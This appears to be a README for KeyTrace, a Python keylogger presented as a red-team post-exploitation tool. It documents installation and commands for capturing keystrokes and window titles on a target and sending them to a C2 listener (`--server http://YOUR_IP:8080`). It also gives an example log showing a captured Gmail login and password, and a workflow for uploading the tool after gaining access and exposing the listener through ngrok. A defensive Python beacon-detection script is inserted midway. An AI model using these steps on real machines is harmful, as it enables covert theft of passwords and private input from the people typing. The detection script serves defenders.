KeyTrace

Post-exploitation keylogger for authorized red team engagements and penetration testing demonstrations.

KeyTrace captures keystrokes on a compromised machine and exfiltrates them to a remote listener. Built to demonstrate post-exploitation impact during authorized penetration tests.


Features

  • Keystroke capture with active window tracking
  • Timestamps per session block
  • Local file logging
  • HTTP exfiltration to remote C2 listener
  • Multi-session listener with per-host log files
  • System metadata collection (hostname, user, IP, OS)
  • Cross-platform: Windows / Linux / macOS

Installation

git clone https://github.com/DavidJara1998/KeyTrace.git
cd KeyTrace
pip install -r requirements.txt

Usage

Step 1 — Start the listener (your machine)

python keytrace.py listen --port 8080

Output:

=== KEYTRACE LISTENER ===
[+] Listening on 0.0.0.0:8080
    Logs saved to: ./keytrace_logs/<hostname>_<user>.log
    Waiting for connections...

Step 2 — Start keylogger on target machine

# With C2 exfiltration
python keytrace.py start --server http://YOUR_IP:8080 --interval 30

# Local only (no network)
python keytrace.py start --log captured.log --interval 60

Step 3 — Read captured data

# Dump local log
python keytrace.py dump --log captured.log

# Remote logs are saved automatically to:
# ./keytrace_logs/<hostname>_<user>.log

Example Output (Listener)

=== KEYTRACE LISTENER ===
[+] Listening on 0.0.0.0:8080

[+] NEW SESSION: DESKTOP-ABC123 | user: john | ip: 192.168.1.105
14:23:01 DESKTOP-ABC123 (john) +342 chars → keytrace_logs/DESKTOP-ABC123_john.log
  [14:22:45] Window: Chrome - Gmail login ...admin@company.com[TAB]Password123[ENTER]

Commands Reference

start     Start keylogger on this machine
dump      Print contents of local log file
listen    Start C2 listener to receive logs from victims

start options:
  --log FILE       Log file path (default: keytrace.log)
  --interval SEC   Send interval in seconds (default: 30)
  --server URL     C2 listener URL

listen options:
  --port PORT      Listen port (default: 8080)
  --host HOST      Bind address (default: 0.0.0.0)
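
Seen from the defender's side, the fixed send interval documented above (default 30 seconds) appears in proxy or flow logs as evenly spaced requests from one host to one destination. The following is an added example, not part of KeyTrace: a Python check that flags such flows. It assumes one request per send interval; the log format, host names, addresses and thresholds (`min_events`, `max_cv`) are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample records: ISO timestamp, source host, destination host:port
SAMPLE_LOG = """\
2024-05-01T14:20:00 ws-017 10.0.5.20:8080
2024-05-01T14:20:05 ws-042 proxy.example:443
2024-05-01T14:20:07 ws-042 proxy.example:443
2024-05-01T14:20:30 ws-017 10.0.5.20:8080
2024-05-01T14:21:01 ws-017 10.0.5.20:8080
2024-05-01T14:21:30 ws-017 10.0.5.20:8080
2024-05-01T14:21:40 ws-042 proxy.example:443
2024-05-01T14:21:41 ws-042 proxy.example:443
2024-05-01T14:22:00 ws-017 10.0.5.20:8080
2024-05-01T14:22:31 ws-017 10.0.5.20:8080
2024-05-01T14:25:10 ws-042 proxy.example:443
2024-05-01T14:25:12 ws-042 proxy.example:443
not a log line
"""

def parse(log_text):
    """Group request timestamps by (source, destination), skipping malformed lines."""
    flows = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, src, dst = parts
        try:
            flows[(src, dst)].append(datetime.fromisoformat(ts))
        except ValueError:
            continue
    return flows

def find_beacons(log_text, min_events=5, max_cv=0.1):
    """Return [(src, dst, mean_gap_seconds)] for flows with near-constant request spacing."""
    hits = []
    for (src, dst), times in parse(log_text).items():
        if len(times) < min_events:
            continue  # too few requests to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Coefficient of variation: spread of the gaps relative to their mean
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            hits.append((src, dst, round(avg, 1)))
    return sorted(hits)

if __name__ == "__main__":
    for src, dst, gap in find_beacons(SAMPLE_LOG):
        print(f"periodic flow: {src} -> {dst} every ~{gap}s")
```

Any client that polls on a fixed timer (update checkers, monitoring agents) matches the same pattern, so hits are leads to triage against known destinations rather than verdicts.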

Red Team Workflow

1. Gain initial access to target machine
2. Upload keytrace.py + modules/ to target
3. Run: python keytrace.py start --server http://YOUR_IP:8080
4. Keystrokes stream to your listener in real time
5. Document captured credentials in pentest report

For LAN-only scenarios: use your local IP (192.168.x.x)
For internet targets: expose your listener via ngrok: ngrok http 8080


Legal Disclaimer

This tool is intended exclusively for authorized penetration testing and red team engagements. You must have explicit written permission from the system owner before deploying this tool. Unauthorized use is illegal under computer fraud laws in most jurisdictions. The author assumes no liability for misuse.


License

MIT License
